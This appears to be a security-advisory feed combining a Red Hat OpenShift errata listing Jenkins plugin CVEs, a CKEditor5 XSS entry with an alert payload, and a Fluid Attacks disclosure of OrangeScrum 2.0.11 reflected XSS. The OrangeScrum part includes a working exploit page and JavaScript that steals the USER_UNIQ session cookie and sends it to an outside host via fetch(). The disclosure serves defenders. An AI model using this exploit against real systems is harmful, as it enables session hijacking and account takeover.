* jenkins-plugin/script-security: Whole-script approval in Script Security  
Plugin vulnerable to SHA-1 collisions (CVE-2022-45379)  
* jenkins-plugin/JUnit: Stored XSS vulnerability in JUnit Plugin  
(CVE-2022-45380)  
* jenkins-plugin/pipeline-utility-steps: Arbitrary file read vulnerability  
in Pipeline Utility Steps Plugin (CVE-2022-45381)  
* Jenkins plugin: CSRF vulnerability in Script Security Plugin  
(CVE-2022-30946)  
* Jenkins plugin: User-scoped credentials exposed to other users by  
Pipeline SCM API for Blue Ocean Plugin (CVE-2022-30952)  
* Jenkins plugin: CSRF vulnerability in Blue Ocean Plugin (CVE-2022-30953)  
* Jenkins plugin: missing permission checks in Blue Ocean Plugin  
(CVE-2022-30954)  
* jenkins-plugin: Cross-site Request Forgery (CSRF) in  
org.jenkins-ci.plugins:git (CVE-2022-36882)  
* jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
(CVE-2022-36883)  
* jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
(CVE-2022-36884)  
* jenkins plugin: Non-constant time webhook signature comparison in GitHub  
Plugin (CVE-2022-36885)  
* jenkins-plugin/pipeline-stage-view: CSRF protection for any URL can be  
bypassed in Pipeline: Stage View Plugin (CVE-2022-43408)  
* jenkins-plugin/workflow-support: Stored XSS vulnerability in Pipeline:  
Supporting APIs Plugin (CVE-2022-43409)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1856376 - CVE-2020-7692 google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization  
2116840 - CVE-2022-36882 jenkins-plugin: Cross-site Request Forgery (CSRF) in org.jenkins-ci.plugins:git  
2119643 - CVE-2022-30946 Jenkins plugin: CSRF vulnerability in Script Security Plugin  
2119645 - CVE-2022-30952 Jenkins plugin: User-scoped credentials exposed to other users by Pipeline SCM API for Blue Ocean Plugin  
2119646 - CVE-2022-30953 Jenkins plugin: CSRF vulnerability in Blue Ocean Plugin  
2119647 - CVE-2022-30954 Jenkins plugin: missing permission checks in Blue Ocean Plugin  
2119656 - CVE-2022-36883 jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
2119657 - CVE-2022-36884 jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
2119658 - CVE-2022-36885 jenkins plugin: Non-constant time webhook signature comparison in GitHub Plugin  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2136370 - CVE-2022-43406 jenkins-plugin/workflow-cps-global-lib: Sandbox bypass vulnerability in Pipeline: Deprecated Groovy Libraries Plugin  
2136374 - CVE-2022-43405 jenkins-plugin/pipeline-groovy-lib: Sandbox bypass vulnerability in Pipeline: Groovy Libraries Plugin  
2136379 - CVE-2022-43402 jenkins-plugin/workflow-cps: Sandbox bypass vulnerabilities in Pipeline: Groovy Plugin  
2136381 - CVE-2022-43401 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136382 - CVE-2022-43403 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136383 - CVE-2022-43404 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136386 - CVE-2022-43407 jenkins-plugin/pipeline-input-step: CSRF protection for any URL can be bypassed in Pipeline: Input Step Plugin  
2136388 - CVE-2022-43408 jenkins-plugin/pipeline-stage-view: CSRF protection for any URL can be bypassed in Pipeline: Stage View Plugin  
2136391 - CVE-2022-43409 jenkins-plugin/workflow-support: Stored XSS vulnerability in Pipeline: Supporting APIs Plugin  
2143086 - CVE-2022-45380 jenkins-plugin/JUnit: Stored XSS vulnerability in JUnit Plugin  
2143089 - CVE-2022-45381 jenkins-plugin/pipeline-utility-steps: Arbitrary file read vulnerability in Pipeline Utility Steps Plugin  
2143090 - CVE-2022-45379 jenkins-plugin/script-security: Whole-script approval in Script Security Plugin vulnerable to SHA-1 collisions  
2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability

6. Package List:

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el7.src.rpm

x86_64:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el7.x86_64.rpm  
cri-o-debuginfo-1.23.5-5.rhaos4.10.gitd9dec98.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el8.src.rpm  
jenkins-2-plugins-4.10.1675144701-1.el8.src.rpm

aarch64:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el8.aarch64.rpm  
cri-o-debuginfo-1.23.5-5.rhaos4.10.gitd9dec98.el8.aarch64.rpm  
cri-o-debugsource-1.23.5-5.rhaos4.10.gitd9dec98.el8.aarch64.rpm

noarch:  
jenkins-2-plugins-4.10.1675144701-1.el8.noarch.rpm

ppc64le:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el8.ppc64le.rpm  
cri-o-debuginfo-1.23.5-5.rhaos4.10.gitd9dec98.el8.ppc64le.rpm  
cri-o-debugsource-1.23.5-5.rhaos4.10.gitd9dec98.el8.ppc64le.rpm

s390x:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el8.s390x.rpm  
cri-o-debuginfo-1.23.5-5.rhaos4.10.gitd9dec98.el8.s390x.rpm  
cri-o-debugsource-1.23.5-5.rhaos4.10.gitd9dec98.el8.s390x.rpm

x86_64:  
cri-o-1.23.5-5.rhaos4.10.gitd9dec98.el8.x86_64.rpm  
cri-o-debuginfo-1.23.5-5.rhaos4.10.gitd9dec98.el8.x86_64.rpm  
cri-o-debugsource-1.23.5-5.rhaos4.10.gitd9dec98.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-7692  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-30946  
https://access.redhat.com/security/cve/CVE-2022-30952  
https://access.redhat.com/security/cve/CVE-2022-30953  
https://access.redhat.com/security/cve/CVE-2022-30954  
https://access.redhat.com/security/cve/CVE-2022-36882  
https://access.redhat.com/security/cve/CVE-2022-36883  
https://access.redhat.com/security/cve/CVE-2022-36884  
https://access.redhat.com/security/cve/CVE-2022-36885  
https://access.redhat.com/security/cve/CVE-2022-43401  
https://access.redhat.com/security/cve/CVE-2022-43402  
https://access.redhat.com/security/cve/CVE-2022-43403  
https://access.redhat.com/security/cve/CVE-2022-43404  
https://access.redhat.com/security/cve/CVE-2022-43405  
https://access.redhat.com/security/cve/CVE-2022-43406  
https://access.redhat.com/security/cve/CVE-2022-43407  
https://access.redhat.com/security/cve/CVE-2022-43408  
https://access.redhat.com/security/cve/CVE-2022-43409  
https://access.redhat.com/security/cve/CVE-2022-45047  
https://access.redhat.com/security/cve/CVE-2022-45379  
https://access.redhat.com/security/cve/CVE-2022-45380  
https://access.redhat.com/security/cve/CVE-2022-45381  
https://access.redhat.com/security/updates/classification/#critical

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+QTVdzjgjWX9erEAQgHxxAAmUboUHNQ9M5CgissfKumBufrMEUuzGFP  
ZO6+GFZCQurdJh5b+Lz4paVoAuHUWXvMRZD9+qXXDGYzygmV+oHyV4wg+NhJOtxH  
DgS4ycst/Y+8jAQca3sSD5odomDFihjv+/kF2RUVq5/TvaYoJQnwyvBDt5ZDd0h5  
HkulLaK6hzdpFbTtK4ghDEcWIs+CMfitIiXeHg9GReFC4aOLsaOSyjec3VOA+3YY  
tWOaIV1x4XZkadyLsMTau9OAojbrk5rg1xh9itD/WzoAWvO0cTIA4NzyOYL4BuAf  
Sf7VNdHkdL0f0M++nlNZ6MWk3aZHkQ3JDlrHLLmT5olNC709accibk4cwbOqqKto  
5ClfAJiD1qgVUEKI+MwEp0hxuBeNOPcWH3y6jn9BFkUVGE5U6FQkKfbFUSrRMj04  
564ZuOg0ZPSA3Byd6jvJmoIOa+yyI2sJAWC0baIdS58Yk/G+EoHEziwcia73zH5k  
HzbeXwvL8NATXXQuDNE+Y9UUV8uXOhVZ8R1KVFMA3qUQ2aoR5AC7+QT0BtYTmnr8  
zPczSDrv/pAdOnEeO/+J9PWU8xXQ2miFmO8RT6vLKsXvAD1hB219obMhHFSyr1Fe  
zxzurEtRn8kB5N4Y4rC6+clvoma8hoM8L6jHYbEMXRYwzNqXOOrS+Y0eBofYqJW5  
IASUN1Di0QY=  
=I8d3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0560-01

CKSource CKEditor5 version 35.4.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Cross Site Scripting in CKSource's CKEditor5 35.4.0# Google Dork: N/A# Date: February 09, 2023# Exploit Author: Manish Pathak# Vendor Homepage: https://cksource.com/# Software Link: https://ckeditor.com/ckeditor-5/download/# Version: 35.4.0# Tested on: Linux / Web# CVE : CVE-2022-48110CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting(XSS) vulnerability via Full Featured CKEditor5 Widget as the editor failsto sanitize user provided data.An attacker can execute arbitrary script in the browser in the context ofthe affected site. This can allow the attacker to steal cookie-basedauthentication credentials and launch other attacks.CKEditor5 version 35.4.0 is tested & found to be vulnerable.Documentation avaiable athttps://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#securitySecurity Docs Says """The HTML embed feature does not currently executecode in <script> tags. However, it will execute code in the on* andsrc="javascript:..." attributes."""Payload:<div class="raw-html-embed">    <script>alert(456)</script></div>

CKSource CKEditor5 35.4.0 Cross Site Scripting

OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html.

1.  Home
2.  Advisories
3.  OrangeScrum 2.0.11 Reflected XSS via filename

**Summary**

**Name**

OrangeScrum 2.0.11 - Reflected XSS via filename

**Code name**

Oberhofer

**Product**

OrangeScrum

**Affected versions**

2.0.11

**State**

Public

**Release Date**

2023-02-13

**Vulnerability**

**Kind**

Reflected cross-site scripting (XSS)

**Rule**

008\. Reflected cross-site scripting (XSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

**CVSSv3 Base Score**

7.3

**Exploit available**

No

**CVE ID(s)**

CVE-2023-0624

**Description**

OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html.

**Vulnerability**

This vulnerability occurs because the application returns malicious user input in the response with the content-type set to text/html.

**Exploitation**

To exploit this vulnerability, we only need to send the following malicious HTML code to an application user.

**Exploit.html**

    <!DOCTYPE html>
    <html>
        <body>
            <a id="exploit" href="https://retr02332bughunter.orangescrum.com/defect/defects/download?filename=%3Cscript+type=%27text/javascript%27+src=%27https://retr02332.com/exploit-utils.js%27%3E%3C/script%3E"> Exploit</a>
            <script>
                document.getElementById("exploit").click();
            </script>
        </body>
    </html>
    

The malicious JavaScript that we embed in the page is as follows.

**Exploit-utils.js**

    function getCookie(name) {
        const value = `; ${document.cookie}`;
        const parts = value.split(`; ${name}=`);
        if (parts.length === 2) return parts.pop().split(';').shift();
    }
    
    let sessionCookie = `USER_UNIQ=${getCookie("USER_UNIQ")}`;
    
    fetch("https://retr02332.com/leak?"+sessionCookie);
    

Thus, when the user clicks on the malicious link, it will send its session cookie to the attacker's server logs.

**Evidence of exploitation**

POC-XSS-OrangeScrum

**Our security policy**

We have reserved the ID CVE-2023-0624 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: OrangeScrum 2.0.11
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://github.com/Orangescrum/orangescrum/

**Timeline**

2023-02-07

Vulnerability discovered.

2023-02-07

Vendor contacted.

2023-02-07

Vendor replied acknowledging the report.

2023-02-13

Public Disclosure.

Tag

#xss